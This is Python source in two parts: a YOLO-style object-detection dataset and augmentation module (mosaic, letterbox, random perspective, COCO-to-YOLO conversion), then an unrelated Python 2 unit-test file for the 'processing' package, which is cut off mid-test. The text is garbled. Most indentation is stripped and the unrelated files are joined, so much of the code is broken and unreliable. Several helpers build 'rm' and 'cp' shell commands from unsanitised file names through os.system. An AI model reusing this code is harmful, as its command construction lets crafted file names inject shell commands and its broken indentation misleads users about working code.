# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
                        b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
if rank in [-1, 0]:
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
            assert not augment, '%s. Cannot train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
            for i in pbar:  # cache every image into RAM
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = [None, None]
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
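# Hedged worked example for letterbox: a 720x1280 (h x w) frame with
# new_shape=640 and auto=True gives r = min(640/720, 640/1280) = 0.5, so the
# image is resized to 360x640; dh = 640 - 360 = 280 shrinks to 280 % 64 = 24,
# i.e. 12 px of padding on top and bottom, and the returned image is 384x640.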
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
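# Hedged numeric example for box_candidates: a 100x40 box (box1) that an
# augmentation collapses to 30x1 (box2) fails the wh_thr=2 height check and is
# dropped, while a 60x24 result survives: both sides exceed 2 px, the area
# ratio 1440/4000 = 0.36 clears 0.1, and the aspect ratio 2.5 stays below 20.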
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def preprocess_help(data, datatype='train'):
if (datatype == 'train'):
curpath = 'trainAnnotationPath'
curtype = 'train'
elif (datatype == 'val'):
curpath = 'validationAnnotationPath'
curtype = 'val'
else:
curpath = 'testAnnotationPath'
curtype = 'test'
    names = []
    rootDir = None  # returned even when no annotation path attribute is present
if (hasattr(data, curpath)):
annotation_path = getattr(data, curpath)
with open(annotation_path) as f:
train_data = json.load(f)
categories = train_data['categories']
for i in range(len(categories)):
names.append(categories[i]['name'])
nc = len(names)
rootDir = Path(annotation_path).parent.parent
os.makedirs(os.path.join(rootDir, 'images', curtype), exist_ok=True)
os.makedirs(os.path.join(rootDir, 'labels', curtype), exist_ok=True)
file_names = os.listdir(Path(annotation_path).parent)
for file_name in file_names:
shutil.move(os.path.join(Path(annotation_path).parent, file_name), os.path.join(rootDir, 'images', curtype))
for i in range(len(file_names)):
file_name = file_names[i]
try:
image = next(x for x in train_data['images'] if x['file_name'] == file_name)
image_id = image['id']
width = image['width']
height = image['height']
annotations = list(filter(lambda x: x['image_id'] == image_id, train_data['annotations']))
lines = []
for j in range(len(annotations)):
annotation = annotations[j]
category = annotation['category_id']
category_name = next(x for x in train_data['categories'] if x['id'] == category)['name']
categoryid = names.index(category_name)
x, y, widthl, heightl = annotation['bbox']
lines.append('%d %f %f %f %f' % (categoryid, (x + widthl / 2) / width, (y + heightl / 2) / height, widthl / width, heightl / height))
for j in range(len(lines)):
line = lines[j]
with open(os.path.join(rootDir, 'labels', curtype, file_name.split('.')[0] + '.txt'), 'a+') as f:
f.write(line + '\n')
except Exception as e:
pass
return names, rootDir
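# Hedged worked example of the COCO -> YOLO conversion above: for a 640x480
# image, a COCO bbox [x, y, w, h] = [100, 120, 200, 160] with class index 3
# becomes the label line '3 0.312500 0.416667 0.312500 0.333333'
# (centre x = (100 + 100) / 640, centre y = (120 + 80) / 480, w = 200 / 640, h = 160 / 480).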
def preprocess(data):
names, trainRootDir = preprocess_help(data, 'train')
valnames, valRootDir = preprocess_help(data, 'val')
testnames, testRootDir = preprocess_help(data, 'test')
test = val = train = os.path.join(trainRootDir, 'images', 'train')
if (len(valnames) > 0):
val = os.path.join(valRootDir, 'images', 'val')
if (len(testnames) > 0):
test = os.path.join(testRootDir, 'images', 'test')
data_config = {
'train': train,
'val': val,
'test': test,
'nc': len(names),
'names': names
}
yamlC = yaml.dump(data_config)
with open(os.path.join(trainRootDir, 'data.yaml'), 'w+') as f:
f.write(yamlC)
return os.path.join(trainRootDir, 'data.yaml')
|
__init__.py
|
#
# Unit tests for processing package
#
import unittest
import threading
import Queue
import time
import sys
import os
import signal
import array
import copy
import socket
import random
import logging
import ctypes
import processing.dummy
import processing.connection
import processing.managers
import processing.heap
import processing.pool
#
# Constants
#
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(processing._processing,
'HAVE_BROKEN_SEM_GETVALUE', False)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
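#
# Hedged usage sketch for TimingWrapper (illustrative only):
#
#     wait = TimingWrapper(time.sleep)
#     wait(0.2)              # returns None after roughly 0.2 seconds
#     print wait.elapsed     # ~0.2 (the call duration in seconds)
#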
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
#
# Return the value of a semaphore
#
def getValue(self):
try:
return self.getValue()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
current = self.currentProcess()
self.assertTrue(current.isAlive())
self.assertTrue(not current.isDaemon())
if self.TYPE != 'threads':
authkey = current.getAuthKey()
self.assertTrue(type(authkey) is str)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.getPid(), os.getpid())
self.assertEqual(current.getExitCode(), None)
def _test(self, q, *args, **kwds):
current = self.currentProcess()
q.put(args)
q.put(kwds)
q.put(current.getName())
if self.TYPE != 'threads':
q.put(current.getAuthKey())
q.put(current.getPid())
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.setDaemon(True)
current = self.currentProcess()
if self.TYPE != 'threads':
self.assertEquals(p.getAuthKey(), current.getAuthKey())
self.assertEquals(p.isAlive(), False)
self.assertEquals(p.isDaemon(), True)
self.assertTrue(p not in self.activeChildren())
self.assertTrue(type(self.activeChildren()) is list)
self.assertEqual(p.getExitCode(), None)
p.start()
self.assertEquals(p.getExitCode(), None)
self.assertEquals(p.isAlive(), True)
self.assertTrue(p in self.activeChildren())
self.assertEquals(q.get(), args[1:])
self.assertEquals(q.get(), kwargs)
self.assertEquals(q.get(), p.getName())
if self.TYPE != 'threads':
self.assertEquals(q.get(), current.getAuthKey())
self.assertEquals(q.get(), p.getPid())
p.join()
self.assertEquals(p.getExitCode(), 0)
self.assertEquals(p.isAlive(), False)
self.assertTrue(p not in self.activeChildren())
def _test_terminate(self):
time.sleep(1000)
def test_terminate(self):
if self.TYPE == 'threads':
return
p = self.Process(target=self._test_terminate)
p.setDaemon(True)
p.start()
self.assertEqual(p.isAlive(), True)
self.assertTrue(p in self.activeChildren())
self.assertEqual(p.getExitCode(), None)
p.terminate()
join = TimingWrapper(p.join)
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.isAlive(), False)
self.assertTrue(p not in self.activeChildren())
p.join()
# XXX sometimes get p.getExitCode() == 0 on Windows ...
#self.assertEqual(p.getExitCode(), -signal.SIGTERM)
def test_cpuCount(self):
try:
cpus = processing.cpuCount()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_activeChildren(self):
self.assertEqual(type(self.activeChildren()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertTrue(p not in self.activeChildren())
p.start()
self.assertTrue(p in self.activeChildren())
p.join()
self.assertTrue(p not in self.activeChildren())
def _test_recursion(self, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = self.Process(
target=self._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
#
#
#
class _UpperCaser(processing.Process):
def __init__(self):
processing.Process.__init__(self)
self.child_conn, self.parent_conn = processing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
#
#
#
class _TestQueue(BaseTestCase):
def _test_put(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
queue = self.Queue(maxsize=6)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.setDaemon(True)
proc.start()
self.assertEqual(queue.empty(), True)
self.assertEqual(queue.full(), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue.empty(), False)
self.assertEqual(queue.full(), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(Queue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue.empty(), True)
self.assertEqual(queue.full(), False)
proc.join()
def _test_get(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
queue.put(1)
queue.put(2)
if self.TYPE == 'processes':
queue.putmany([3, 4, 5])
else:
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.setDaemon(True)
proc.start()
self.assertEqual(queue.empty(), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue.empty(), False)
self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue.empty(), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(Queue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
